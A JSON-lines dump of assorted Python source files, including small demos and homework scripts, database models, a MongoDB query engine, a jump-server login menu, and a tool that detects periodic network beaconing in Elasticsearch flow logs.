+{"seq_id":"627752664","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"docstring\"\"\"\n\nimport math\n\n\ndef move(x_x0_, y_y0_, step, angle=0):\n \"\"\"Form a complex number.\n Keyword arguments:\n real -- the real part (default 0.0)\n imag -- the imaginary part (default 0.0)\n \"\"\"\n n_x0_ = x_x0_ + step * math.cos(angle)\n n_y0_ = y_y0_ - step * math.sin(angle)\n return n_x0_, n_y0_\n\n\nA_A0_, B_B0_ = move(100, 100, 60, math.pi / 6)\nprint(A_A0_, B_B0_)\n","sub_path":"Python/src/Demo/fun/multi_return_value_test.py","file_name":"multi_return_value_test.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"542330854","text":"\"\"\"\nNatural numbers according 'ISO 80000-2:2009(E)\npart 2: Mathematical signs and symbols to be used in the natural sciences and technology'\nN = {0,1,2,3...}\n\"\"\"\n#Welcome message\nprint('''\n* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\nHello, if you enter two numbers below I'll count you a sum\nof all Natural numbers between them.\nType GO if you want to continue.\nType NOPE if you want to exit the programm.\n(Please, notice that you can use NOPE anytime you'd like to exit)\n* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n''')\nnum_1 = None\nnum_2 = None\ndes = 0 #this variable shows in what step we are - for correct work of 'NOPE' command :)\nty = 'Thank you.'\nnope = 'NOPE'\nokay_msg = 'Okay, maybe next time...'\nnot_num_msg = 'Seems it\\'s not a number, try again'\nROUND_C = 0.4 #the constant we should add to number if we want round() to larger integer\nsum_nat = 0\n\nwhile des == 0:\n go_msg = input('Make you choice >>> ')\n if go_msg.upper() == 'GO':\n # Go to count!\n des = 1\n print('Perfect, now enter numbers!')\n\n while des == 1:\n # Check if 1st input is correct\n num_1 = input('Put here your first number >>> ').strip()\n if num_1:\n num_1_checker = (num_1.replace('.','',1))[0].replace('-','') + num_1.replace('.','',1)[1:]\n if num_1_checker.isnumeric():\n print(ty)\n des = 2\n\n while des == 2:\n # Check if 2nd input is correct\n num_2 = input('And another number >>> ').strip()\n\n if num_2:\n num_2_checker = (num_2.replace('.','',1))[0].replace('-','') + num_2.replace('.','',1)[1:]\n\n if num_2_checker.isnumeric():\n des = 3\n # Check which number is larger\n num_1_m = min(num_1,num_2)\n num_2_m = max(num_1,num_2)\n\n # Convert inputs and round them to Integer\n num_1_r = round(float(num_1_m) + ROUND_C)\n num_2_r = int(float(num_2_m))\n\n # Check if there are can be any Natural numbers between 2 inputs\n if num_2_r == num_1_r:\n print(f'Seems, there are no any Natural numbers between {num_1} and {num_2}')\n break\n\n # Count the sum of all Natural number between num_1 and num_2\n for i in range(num_1_r, num_2_r+1):\n\n if i >= 0:\n sum_nat += i\n print(ty)\n print(f'Result: the sum of all Natural numbers between {num_1} and {num_2} is {sum_nat}')\n\n elif num_2.upper() == nope:\n print(okay_msg)\n break\n else:\n print(not_num_msg)\n\n elif num_1.upper() == nope:\n print(okay_msg)\n break\n else:\n print(not_num_msg)\n\n elif go_msg.upper() == nope:\n print(okay_msg)\n break\n\n else:\n print('Sorry, i can\\'t understand you.')\n","sub_path":"base/hw/hw_2_1.py","file_name":"hw_2_1.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"141249145","text":"import logging\nlog = logging.getLogger('brain')\n\nlog.debug('lol')\n\nticks = 0\n\n\n@on('RESIZE')\ndef resize(canvas):\n global log\n log.debug('resize event')\n\n\n@on('QUIT')\ndef quit(canvas):\n global log\n log.debug('quit event')\n\n\n@on('TICK')\ndef tick(canvas):\n global log\n global ticks\n if ticks % 50 == 0:\n print('.')\n ticks += 1\n\n\n@on('CONNECT')\ndef connect(canvas, client):\n global log\n log.debug('connect event %s', client)\n\n\n@on('DISCONNECT')\ndef disconnect(canvas, client):\n global log\n log.debug('disconnect event %s', client)\n\n\n@on('COMMAND-PX')\ndef command_px(canvas, client, *args):\n global log\n log.debug('px command event %s %s', client, args)\n assert len(args) == 3\n\n x, y, c = args\n c = c.lower().strip('#')\n\n assert x.isdecimal()\n assert y.isdecimal()\n assert 6 <= len(c) <= 8\n\n # pad optional alpha\n c += 'f' * (8 - len(c))\n\n x, y = int(x), int(y)\n r, g, b, a = tuple(int(c[i:i+2], 16) for i in (0, 2, 4, 6))\n\n canvas.set_pixel(x, y, r, g, b, a)\n return True\n\n\n@on('COMMAND-WL')\ndef command_wl(canvas, client, *args):\n import base64\n global log\n log.debug(\"wl command event %s %d args\", client, len(args))\n w, h = canvas.size\n raw_size = w * h * canvas.depth\n b64_size = int(raw_size + raw_size/3)\n assert len(args) == 1\n base = args[0]\n assert len(base) == b64_size\n data = base64.b64decode(base)\n assert len(data) == w * h * canvas.depth\n\n for y in range(h):\n for x in range(w):\n p = (y*w + x) * 3\n canvas.set_pixel(x, y, data[p], data[p+1], data[p+2], 0xff)\n return True\n","sub_path":"pixelflut/canvas_brain.py","file_name":"canvas_brain.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"166810118","text":"from openpatch_core.database import db, gt\nfrom openpatch_core.models import Base\nfrom openpatch_core.database.types import GUID\nfrom sqlalchemy import func\nfrom sqlalchemy.ext.orderinglist import ordering_list\nimport uuid\n\n\nclass ItemTask(Base):\n __tablename__ = gt(\"item_task\")\n\n id = db.Column(GUID(), primary_key=True, default=uuid.uuid4)\n version = db.Column(db.Integer)\n item_id = db.Column(GUID())\n task = db.Column(db.Text)\n text = db.Column(db.JSON)\n format_type = db.Column(db.String(60))\n format_version = db.Column(db.Integer)\n data = db.Column(db.JSON)\n evaluation = db.Column(db.JSON)\n position = db.Column(db.Integer)\n\n __table_args__ = (\n db.ForeignKeyConstraint(\n [\"version\", \"item_id\"],\n [\n \"{}.version\".format(gt(\"item_version\")),\n \"{}.item_id\".format(gt(\"item_version\")),\n ],\n ),\n {},\n )\n item_version = db.relationship(\n \"ItemVersion\",\n primaryjoin=\"and_(ItemTask.version==ItemVersion.version, ItemTask.item_id==ItemVersion.item_id)\",\n viewonly=True,\n )\n\n def copy(self):\n item_task = ItemTask(\n task=self.task,\n text=self.text,\n format_type=self.format_type,\n format_version=self.format_version,\n data=self.data,\n evaluation=self.evaluation,\n )\n return item_task\n\n\nclass ItemVersion(Base):\n __tablename__ = gt(\"item_version\")\n\n member_id = db.Column(GUID(), db.ForeignKey(\"{}.id\".format(gt(\"member\"))))\n version = db.Column(db.Integer, primary_key=True)\n version_message = db.Column(db.Text)\n status = db.Column(db.String(20))\n latest = db.Column(db.Boolean)\n\n item_id = db.Column(\n GUID, db.ForeignKey(\"{}.id\".format(gt(\"item\"))), primary_key=True\n )\n item = db.relationship(\"Item\", back_populates=\"versions\")\n\n tasks = db.relationship(\n \"ItemTask\",\n order_by=\"ItemTask.position\",\n collection_class=ordering_list(\"position\"),\n )\n member = db.relationship(\"Member\", back_populates=\"item_versions\")\n\n @classmethod\n def get_draft(cls, item_id):\n return cls.query.filter_by(item_id=item_id, status=\"draft\").first()\n\n def copy(self):\n latest_version = (\n db.session.query(func.max(ItemVersion.version))\n .filter(ItemVersion.item == self.item)\n .scalar()\n )\n item_version = ItemVersion(\n member=self.member,\n version=latest_version + 1,\n version_message=self.version_message,\n status=self.status,\n item=self.item,\n latest=self.latest,\n )\n\n for task in self.tasks:\n item_version.tasks.append(task.copy())\n\n return item_version\n\n @classmethod\n def get_latest(cls, item_id):\n return cls.query.filter_by(item_id=item_id, latest=True).first()\n\n def permitted_write(self, jwt_claims):\n return self.item.permitted_write(jwt_claims)\n\n def permitted_read(self, jwt_claims):\n return self.item.permitted_read(jwt_claims)\n","sub_path":"openpatch_itembank/models/item_version.py","file_name":"item_version.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"629129443","text":"import csv\nimport os\nimport shutil\n\n\ndir = r\"annotations-csv/\"\nlist = os.listdir(dir)\n\nflag = 0\n\nfor i in range(0,len(list)): #len(list)\n file_name_no_ext = list[i].rstrip('.csv')\n print(file_name_no_ext)\n path = os.path.join(dir,list[i])\n if os.path.isfile(path):\n out = open(path,'r')\n read_csv = csv.reader(out,dialect='excel')\n for line in read_csv: #循环输出csv中的所有数据\n if flag == 0:\n flag = flag + 1\n continue\n flag = flag + 1\n if flag > 1:\n shutil.copyfile(path, r\"all-have-apples/annotations-csv/\"+file_name_no_ext+'.csv')\n shutil.copyfile(r\"images/\"+file_name_no_ext+'.png', r\"all-have-apples/images/\"+file_name_no_ext+'.png')\n flag = 0\n out.close()\nprint(len(list))","sub_path":"assets/python_scripts/remove-noApples.py","file_name":"remove-noApples.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"573364788","text":"# -*- coding: UTF-8 -*-\nimport re\nimport pymongo\nimport logging\nimport traceback\nimport json\n\nfrom . import EngineBase\nfrom .models import ResultSet\nfrom bson import json_util\nfrom pymongo.errors import OperationFailure\n\n__author__ = 'jackie'\n\nlogger = logging.getLogger('default')\n\n\nclass MongoEngine(EngineBase):\n def get_connection(self, db_name=None):\n self.db_name = self.db_name or 'admin'\n conn = pymongo.MongoClient(self.host, self.port, authSource=self.db_name, connect=True, connectTimeoutMS=10000)\n if self.user and self.password:\n conn[self.db_name].authenticate(self.user, self.password, self.db_name)\n return conn\n\n @property\n def name(self): # pragma: no cover\n return 'Mongo'\n\n @property\n def info(self): # pragma: no cover\n return 'Mongo engine'\n\n def get_all_databases(self):\n result = ResultSet()\n conn = self.get_connection()\n try:\n result.rows = conn.list_database_names()\n except OperationFailure:\n result.rows = [self.db_name]\n return result\n\n def get_all_tables(self, db_name, **kwargs):\n result = ResultSet()\n conn = self.get_connection()\n db = conn[db_name]\n result.rows = db.list_collection_names()\n return result\n\n def get_all_columns_by_tb(self, db_name, tb_name, **kwargs):\n \"\"\"获取所有字段, 返回一个ResultSet\"\"\"\n # https://github.com/getredash/redash/blob/master/redash/query_runner/mongodb.py\n result = ResultSet()\n db = self.get_connection()[db_name]\n collection_name = tb_name\n documents_sample = []\n if \"viewOn\" in db[collection_name].options():\n for d in db[collection_name].find().limit(2):\n documents_sample.append(d)\n else:\n for d in db[collection_name].find().sort([(\"$natural\", 1)]).limit(1):\n documents_sample.append(d)\n\n for d in db[collection_name].find().sort([(\"$natural\", -1)]).limit(1):\n documents_sample.append(d)\n columns = []\n # _merge_property_names\n for document in documents_sample:\n for prop in document:\n if prop not in columns:\n columns.append(prop)\n result.column_list = ['COLUMN_NAME']\n result.rows = columns\n return result\n\n def describe_table(self, db_name, tb_name, **kwargs):\n \"\"\"return ResultSet 类似查询\"\"\"\n result = self.get_all_columns_by_tb(db_name=db_name, tb_name=tb_name)\n result.rows = [[[r], ] for r in result.rows]\n return result\n\n def query_check(self, db_name=None, sql=''):\n \"\"\"提交查询前的检查\"\"\"\n result = {'msg': '', 'bad_query': True, 'filtered_sql': sql, 'has_star': False}\n safe_cmd = ['find']\n sql = sql.split('.')[1]\n for cmd in safe_cmd:\n if re.match(fr'^{cmd}\\(.*', sql.strip(), re.I):\n result['bad_query'] = False\n break\n if result['bad_query']:\n result['msg'] = \"\"\"禁止执行该命令!正确格式为:{collection_name}.find() or {collection_name}.find(expression)\"\"\", \\\n \"\"\"如 : 'test.find({\"id\":{\"$gt\":1.0}})'\"\"\"\n return result\n\n def query(self, db_name=None, sql='', limit_num=0, close_conn=True, **kwargs):\n result_set = ResultSet(full_sql=sql)\n try:\n conn = self.get_connection()\n db = conn[db_name]\n collect = db[sql.split('.')[0]]\n match = re.compile(r'[(](.*)[)]', re.S)\n sql = re.findall(match, sql)[0]\n if sql != '':\n sql = json.loads(sql)\n result = collect.find(sql).limit(limit_num)\n else:\n result = collect.find(sql).limit(limit_num)\n rows = json.loads(json_util.dumps(result))\n result_set.column_list = ['Result']\n if isinstance(rows, list):\n result_set.rows = tuple([json.dumps(x, ensure_ascii=False)] for x in rows)\n result_set.affected_rows = len(rows)\n except Exception as e:\n logger.warning(f\"Mongo命令执行报错,语句:{sql}, 错误信息:{traceback.format_exc()}\")\n result_set.error = str(e)\n return result_set\n","sub_path":"sql/engines/mongo.py","file_name":"mongo.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"255892483","text":"import pandas as pd \nimport numpy as np\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\nx = pd.read_csv('RMSEs/keras_RMSE.csv', index_col=0).reset_index(drop=True)\n\nplt.figure()\nplt.plot(x['range'], x['val'], 'x')\n\nx = pd.read_csv('keras_RMSE.csv', index_col=0).reset_index(drop=True)\n\n\nprint(np.corrcoef(x['range'], x['val'])[1, 0])\n\n\n\n\ndef boxplots(opt, x):\n opts = np.unique(x[opt])\n \n for ep in ['cal', 'val']: \n dt = pd.DataFrame()\n for i in opts:\n sub = x[x[opt] == i][ep]\n sub.name = i\n sub.index = range(sub.shape[0])\n \n dt = pd.concat([dt, sub], axis=1)\n\n plt.figure(figsize=(10,8), dpi=200)\n dt.boxplot(grid=False, rot=45)\n plt.savefig('post/'+opt+'_'+ep+'.jpg')\n plt.close()\n\n\ncolnames = list(map(str, x.columns))\ncolnames.remove('cal')\ncolnames.remove('val')\n\nfor opt in colnames:\n boxplots(opt, x)\n \n \n \n \ndef plots(opt, x):\n fig, (ax1, ax2) = plt.subplots(1, 2, sharey=True, figsize=(10, 6), dpi=200)\n \n ax1.plot(x[opt], x['cal'], 'x')\n ax1.set_title('cal')\n ax1.set_ylabel('RMSE')\n ax1.set_xlabel(opt)\n ax2.plot(x[opt], x['val'], 'x')\n ax2.set_title('val')\n \n fig.savefig('post_plots/'+opt+'.jpg')\n plt.close()\n\n\nfor opt in x.columns:\n plots(opt, x)\n\n \n \n\nbest = x.sort_values('val')\nbest.to_csv('out_pres/RMSE_table.csv', index=False)\nbest = best.iloc[:10]\n","sub_path":"zzz_scripts/post_paper.py","file_name":"post_paper.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"497864998","text":"from backend import models\nfrom django.contrib.auth import authenticate\nfrom jump_king.lib import demo\nclass Ssh_handler(object):\n def auth(self):\n count=0\n while count <=3:\n username=input('用户名:>>')\n password=input('密码:>>')\n user=authenticate(username=username,password=password)\n if user:\n self.user=user\n count=0\n return True\n else:\n count +=1\n continue\n else:\n return False\n\n def host_list(self):\n if self.auth():\n while True:\n groups=self.user.host_groups.all()\n print('你所能操作的服务器组:')\n for index,group in enumerate(groups):\n print('[%s] ---- %s'%(index,group))\n print('输入Z显示未分组主机:>>')\n choice=input('请选择要操作的组:>>').strip()\n if choice == 'Z' or choice == 'z':\n group=self.user\n else:\n choice=int(choice)\n group=groups[choice]\n while True:\n try:\n for index,host in enumerate(group.host_to_remote_users.all()):\n print('[%s] ---- %s'%(index,host))\n print('输入b返回上级菜单')\n choice=input('请选择要操作的主机:>>').strip()\n if choice == 'b':\n break\n choice=int(choice)\n host=group.host_to_remote_users.all()[choice]\n self.user.auditlog=models.Audit_Log\n demo.start_connect(user_obj=self.user,host=host)\n\n except Exception:\n print('输入错误')\n\n\n\n\n else:\n print('认证失败')\n","sub_path":"jump_king/lib/ssh_interactive.py","file_name":"ssh_interactive.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"178949291","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Author: Homer\n# Date: 2018-05-15\n# Version: 0.3\n# ELK\n\n\nimport os, json, time, datetime, argparse\nfrom multiprocessing import Process, JoinableQueue, Lock, Manager\n\nimport pandas as pd\nfrom pandas.io.json import json_normalize\nfrom elasticsearch import Elasticsearch, helpers\nfrom tqdm import tqdm, tqdm_notebook\n\nfrom iputils import private_check, multicast_check, reserved_check\nfrom tld import TLD\nfrom whois import WhoisLookup\nfrom threat import TI\n# from es_domain import GetDomain\n\n\ndef readJson(files):\n with open(files, encoding='utf-8') as f:\n data = json.load(f)\n return data\n\n\nclass HawkEye():\n def __init__(self):\n '''\n 初始化配置文件设置\n '''\n\n # 脚本参数初始化\n self.parser = argparse.ArgumentParser(description='基于Flow的周期检测工具. by Homer.')\n self.parser.add_argument('-c', dest='config', type=str, help='Config Files. Default: config.json')\n self.parser.add_argument('-f', dest='file', type=str, help='Load local raw_data')\n self.parser.add_argument('-o', dest='output', type=str, help='Output Files')\n self.parser.add_argument('--ti', help='Threat Intelligence', action='store_true')\n self.parser.add_argument('--tld', help='Host to TLD', action='store_true')\n self.parser.add_argument('--dns', help='IP TO Domain', action='store_true')\n self.parser.add_argument('--whois', help='WhoisLookup', action='store_true')\n self.parser.add_argument('--json', help='Save CSV Files', action='store_true')\n self.parser.add_argument('--csv', help='Save Json Files', action='store_true')\n self.parser.add_argument('--debug', help='Enable debug mode', action='store_true')\n self.args = self.parser.parse_args()\n \n if not self.args.config:\n print('Specify configuration file.')\n os._exit(0)\n\n if not self.args.output:\n print('Specify Save Path.')\n os._exit(0)\n\n self.config = readJson(self.args.config)\n\n # 产品类型初始化\n self.product = self.config['product'].lower()\n \n # 实例化ES\n host = self.config['host']\n timeout = self.config['timeout']\n self.es = Elasticsearch(host, timeout=timeout)\n \n # ES字段初始化\n self.index = self.config['index']\n self.timestamp = self.config['field']['timestamp']\n self.src_ip = self.config['field']['src_ip']\n self.proto = self.config['field']['proto']\n self.dst_ip = self.config['field']['dst_ip']\n self.dst_port = self.config['field']['dst_port']\n self.flow_id = self.config['field']['flow_id']\n self.flow_age = self.config['field']['flow_age']\n self.flow_bytes_toserver = self.config['field']['flow_bytes_toserver']\n\n # 扩展字段 2018_05_22\n self.columns = self.config['columns']['basis_columns']\n self.ext_columns = self.config['columns']['ext_columns']\n \n if self.proto:\n self.columns.insert(1, self.ext_columns[0])\n if self.flow_bytes_toserver:\n self.columns.append(self.ext_columns[1])\n if self.product == 'nta' or self.product == 'nta':\n self.columns.extend(self.ext_columns[2:])\n\n # ES语句初始化\n event_type = self.config['event_type']\n period = self.config['period']\n self.gte, self.lte = self.getTimestamp(period)\n self.body = self.hour_query_body(event_type)\n\n # 周期性检测配置\n self.min_occur = self.config['min_occur']\n self.min_interval = self.config['min_interval']\n self.min_percent = self.config['min_percent']\n self.window = self.config['window']\n self.threads = self.config['threads']\n \n # 多进程配置\n self.q_job = JoinableQueue()\n self.lock_df = Lock()\n self.lock_list = Lock()\n\n \n def getTimestamp(self, _hour):\n '''\n 获取时间戳方法\n '''\n now = int(time.time() * 1000)\n seconds = 1000\n minutes = 60 * seconds\n hours = 60 * minutes\n lte = now\n gte = int(now - _hour * hours)\n \n return gte, lte\n \n \n def hour_query_body(self, _event_type):\n '''\n 查询语句\n '''\n exclude_field = self.config.get('must_not', [])\n\n # 新增测试代码 2018_05_22\n\n timestamp_field = self.timestamp\n event_field = 'event_type'\n raw_field = list(self.config['field'].values())\n\n if self.product == 'ep' or self.product == 'nta':\n event_field = 'event_name'\n timestamp_field = 'occur_time'\n \n if self.product == 'nta':\n raw_field = ['original_log']\n\n include_field = self.config.get('must', [])\n \n \n body = {\n '_source': raw_field,\n 'query': {\n 'bool': {\n 'filter': [\n {\n 'term': {\n event_field: _event_type\n }\n },\n {\n 'range': {\n timestamp_field: {\n 'gte': self.gte,\n 'lte': self.lte,\n 'format': 'epoch_millis'\n }\n }\n }\n ],\n 'must_not': exclude_field,\n 'must': include_field # 新增代码 2018_05_22\n }\n }\n }\n \n return body\n\n \n def search(self):\n '''\n 滚动查询方法\n '''\n es_results = helpers.scan(\n client = self.es,\n index = self.index,\n query = self.body,\n size = 10000,\n scroll = '90m',\n timeout = '10m'\n )\n json_results = [ item['_source'] for item in tqdm(es_results)]\n df_results = json_normalize(json_results)\n\n return df_results\n\n \n def tetrad(self, _df):\n\n if self.proto:\n # tetrad: src_ip、proto、dst_ip、dst_port\n _df['tetrad_id'] = (_df[self.src_ip] + _df[self.proto] + _df[self.dst_ip] + _df[self.dst_port].astype(str)).apply(hash)\n else:\n # tetrad: src_ip、dst_ip、dst_port\n _df['tetrad_id'] = (_df[self.src_ip] + _df[self.dst_ip] + _df[self.dst_port].astype(str)).apply(hash)\n\n _df['tetrad_freq'] = _df.groupby('tetrad_id')['tetrad_id'].transform('count').fillna(0).astype(int)\n \n return _df\n\n \n def percent_grouping(self, _dict, _total):\n '''\n 百分比计算\n '''\n mx = 0\n interval = 0\n # Finding the key with the largest value (interval with most events)\n mx_key = int(max(iter(list(_dict.keys())), key=(lambda key: _dict[key])))\n\n mx_percent = 0.0\n\n for i in range(mx_key - self.window, mx_key + 1):\n current = 0\n # Finding center of current window\n curr_interval = i + int(self.window / 2)\n for j in range(i, i + self.window):\n if j in _dict:\n current += _dict[j]\n percent = float(current) / _total * 100\n\n if percent > mx_percent:\n mx_percent = percent\n interval = curr_interval\n\n return interval, mx_percent\n \n \n def find_beacon(self, _raw_data, _beacon_list):\n '''\n 查询周期方法\n '''\n\n if self.product == 'nta' or self.product == 'ep':\n milliseconds = 1000\n else:\n milliseconds = 1000000000\n\n while not self.q_job.empty():\n tetrad_id = self.q_job.get()\n self.lock_df.acquire()\n work = _raw_data[_raw_data.tetrad_id == tetrad_id].reset_index(drop=True)\n self.lock_df.release()\n \n work[self.timestamp] = pd.to_datetime(work[self.timestamp])\n work[self.timestamp] = (work[self.timestamp].astype(int) / milliseconds).astype(int)\n work = work.sort_values([self.timestamp])\n work['delta'] = (work[self.timestamp] - work[self.timestamp].shift()).fillna(0)\n work = work[1:]\n\n d = dict(work.delta.value_counts())\n for key in list(d.keys()):\n if key < self.min_interval:\n del d[key]\n \n # Finding the total number of events\n total = sum(d.values())\n \n if d and total > self.min_occur:\n _window, _percent = self.percent_grouping(d, total)\n if _percent > self.min_percent and total > self.min_occur:\n percent = int(_percent)\n window = _window\n src_ip = work[self.src_ip].unique()[0] \n dst_ip = work[self.dst_ip].unique()[0]\n dst_port = work[self.dst_port].unique()[0]\n src_degree = len(work[self.dst_ip].unique())\n occur = total\n\n col = [src_ip, dst_ip, dst_port, src_degree, occur, percent, window]\n\n if self.proto:\n proto = work[self.proto].unique()[0]\n col.insert(1, proto)\n\n if self.flow_bytes_toserver:\n flow_bytes_sum = work[self.flow_bytes_toserver].sum()\n col.append(flow_bytes_sum)\n\n if self.product == 'nta' or self.product == 'suricata':\n groups = {\n self.flow_bytes_toserver: ['min', 'max', 'mean', 'std'],\n self.flow_age: ['min', 'max', 'mean', 'std']\n }\n\n columns = {\n 'flow_bytes': {\n 'min': 'flow_bytes_min',\n 'max': 'flow_bytes_max',\n 'mean': 'flow_bytes_mean',\n 'std': 'flow_bytes_std'\n },\n 'flow_age': {\n 'min': 'flow_age_min',\n 'max': 'flow_age_max',\n 'mean': 'flow_age_mean',\n 'std': 'flow_age_std'\n }\n }\n\n work_group = work.groupby('tetrad_id').aggregate(groups)\n work_flow_bytes = work_group[self.flow_bytes_toserver].rename(columns=columns['flow_bytes'])\n work_flow_age = work_group[self.flow_age].rename(columns=columns['flow_age'])\n \n flow_bytes_val = work_flow_bytes.values.tolist()[0]\n flow_age_val = work_flow_age.values.tolist()[0]\n\n col.extend(flow_bytes_val)\n col.extend(flow_age_val)\n\n self.lock_list.acquire()\n _beacon_list.append(col)\n self.lock_list.release()\n \n self.q_job.task_done()\n\n \n def find_beacons(self, _raw_data):\n '''\n 多线程分析\n '''\n\n high_freq = list(_raw_data[_raw_data.tetrad_freq > self.min_occur].groupby('tetrad_id').groups.keys())\n\n for _tetrad_id in high_freq:\n self.q_job.put(_tetrad_id)\n\n mgr = Manager()\n beacon_list = mgr.list()\n processes = [ Process(target=self.find_beacon, args=(_raw_data, beacon_list,)) for thread in range(self.threads) ]\n\n # Run processes\n for p in processes:\n p.start()\n\n # Exit the completed processes\n for p in processes:\n p.join()\n\n beacon_list = list(beacon_list)\n beacon_df = pd.DataFrame(beacon_list, columns=self.columns).dropna()\n beacon_df.interval = beacon_df.interval.astype(int)\n\n beacon_df['dst_degree'] = beacon_df.groupby('dst_ip')['dst_ip'].transform('count').fillna(0).astype(int)\n\n private_check_src_obj = beacon_df['src_ip'].apply(private_check)\n private_check_dst_obj = beacon_df['dst_ip'].apply(private_check)\n multicast_check_dst_obj = beacon_df['dst_ip'].apply(multicast_check)\n reserved_check_dst_obj = beacon_df['dst_ip'].apply(reserved_check)\n beacon_df = beacon_df[(private_check_src_obj) & (~multicast_check_dst_obj) & (~reserved_check_dst_obj) & (~private_check_dst_obj)]\n\n return beacon_df\n\n\n def ntaFlow_normalization(self, _original_log):\n '''\n NTA数据标准化\n '''\n original_log_raw = _original_log['original_log'].str.strip()\n original_log_raw = original_log_raw.apply(lambda original_log: json.loads(original_log))\n \n original_log = pd.DataFrame(original_log_raw.tolist())\n\n if self.flow_bytes_toserver:\n original_log['bytes_toserver'] = original_log['flow'].apply(lambda x: x.get('bytes_toserver'))\n \n if self.flow_age:\n original_log['age'] = original_log['flow'].apply(lambda x: x.get('age'))\n \n col = ['@end_timestamp', 'app_proto', 'app_proto_tc', 'app_proto_ts', 'flow', 'ndpi_app_proto', 'protocol', 'tcp', 'src_port', \\\n 'app_proto_expected', 'app_proto_orig', 'icmp_code', 'icmp_type']\n\n for i in col:\n if i in original_log.columns:\n original_log.drop(i, axis=1, inplace=True)\n \n return original_log\n\n\n def dns_query_body(self, _dst_ip, _rdata):\n '''\n DNS响应事件 请求体\n '''\n body = {\n \"query\": {\n \"bool\": {\n \"filter\": [\n {\n \"term\": {\n \"event_digest\": \"nta_dns\"\n }\n },\n {\n \"term\": {\n \"event_name\": \"DNS响应\"\n }\n },\n {\n \"term\": {\n \"dst_address\": _dst_ip # 对应 analyze_data: src_ip\n }\n },\n {\n \"term\": {\n \"dns_answer\": _rdata # 对应 analyze_data: dst_ip\n }\n },\n {\n 'range': {\n 'occur_time': {\n 'gte': self.gte,\n 'lte': self.lte,\n 'format': 'epoch_millis'\n }\n }\n }\n ]\n }\n },\n \"aggs\": {\n \"rrname\": {\n \"terms\": {\n \"field\": \"domain_name\"\n }\n }\n },\n \"size\": 0\n }\n\n return body\n\n\n def dns_search(self, _df):\n '''\n 1. DNS响应数据查询\n 2. 格式化输出\n '''\n dst_ip = _df['src_ip']\n dns_rdata = _df['dst_ip']\n body = self.dns_query_body(dst_ip, dns_rdata)\n dns_json = self.es.search(index=self.index, body=body)\n dns_data = dns_json['aggregations']['rrname']['buckets']\n if dns_data:\n dns_data = json_normalize(dns_data).key.tolist()\n\n _df['domain'] = dns_data\n\n return _df\n\n \n def filter_dns(self, _df):\n '''\n DNS响应查询\n '''\n if self.proto:\n filter_port_obj = _df[self.dst_port] == 53\n filter_proto_obj = _df[self.proto] == 'UDP'\n df = _df[(~filter_proto_obj) & (~filter_port_obj)]\n else:\n filter_port_obj = _df[self.dst_port] == 53\n df = _df[~filter_port_obj]\n\n return df\n\n\n def save_file(self, _df, _file):\n if self.args.json:\n suffix = '.json'\n _df.to_json(self.args.output + _file + suffix, orient='index')\n elif self.args.csv:\n suffix = '.csv'\n _df.to_csv(self.args.output + _file + suffix, index=False)\n print('Data saved Successfully.')\n\n\n def load_file(self, _file):\n reader = pd.read_csv(_file, chunksize=100000000)\n chunks = []\n for chunk in reader:\n chunks.append(chunk)\n df = pd.concat(chunks)\n print('Data loading Successful.')\n\n return df\n\n\n def main(self):\n\n if not self.args.file:\n print('Searching Netflow.')\n res = self.search()\n # if self.args.debug:\n # res.to_csv(self.args.output + 'raw_data_search.csv', index=False)\n\n # 标准化 NTA 数据\n if self.product == 'nta':\n res = self.ntaFlow_normalization(res)\n\n print('Create Tetrad.')\n res = self.tetrad(res)\n if self.args.debug:\n res.to_csv(self.args.output + 'raw_data.csv', index=False)\n else:\n print('Data loading.')\n res = self.load_file(self.args.file)\n \n # 分析数据\n print('Data analysis.')\n res = self.find_beacons(res)\n if self.args.debug:\n self.save_file(res, 'analyze_data_fin')\n print('Data analysis completed.')\n\n if self.args.dns:\n if not res.empty:\n # Local WhoisLookup\n res = self.filter_dns(res)\n tqdm.pandas(desc=\"Local WhoisLookup\")\n res = res.progress_apply(lambda x: self.dns_search(x), axis=1)\n if self.args.debug:\n self.save_file(res, 'local_whois_fin')\n print('Local WhoisLookup completed.')\n\n if self.args.tld:\n # Domain to TLD\n tools_tld = TLD()\n res = tools_tld.main(res)\n if self.args.debug:\n self.save_file(res, 'local_tld_fin')\n print('Domain to TLD completed.')\n else:\n print('The result is empty, Local WhoisLookup not Working.')\n\n if self.args.whois:\n if not res.empty:\n # Online WhoisLookup\n tools_whois = WhoisLookup()\n res = tools_whois.main(res)\n if self.args.debug:\n self.save_file(res, 'online_whois_fin')\n print('Online WhoisLookup completed.')\n else:\n print('The result is empty, Online WhoisLookup not Working.')\n\n if self.args.ti:\n # Threat Intelligence\n tools_ti = TI()\n if not res.empty:\n res = tools_ti.main(res)\n if self.args.debug:\n self.save_file(res, 'ti_fin')\n print('Check Threat Intelligence completed.')\n else:\n print('The result is empty, Threat Intelligence not working.')\n \n \n res.sort_values('percent', ascending=False, inplace=True)\n res.reset_index(drop=True, inplace=True)\n\n self.save_file(res, 'analysis_result')\n \n print('Analysis completed, program exit.')\n\n os._exit(0)\n\n\nif __name__ == '__main__':\n hawkEye = HawkEye()\n 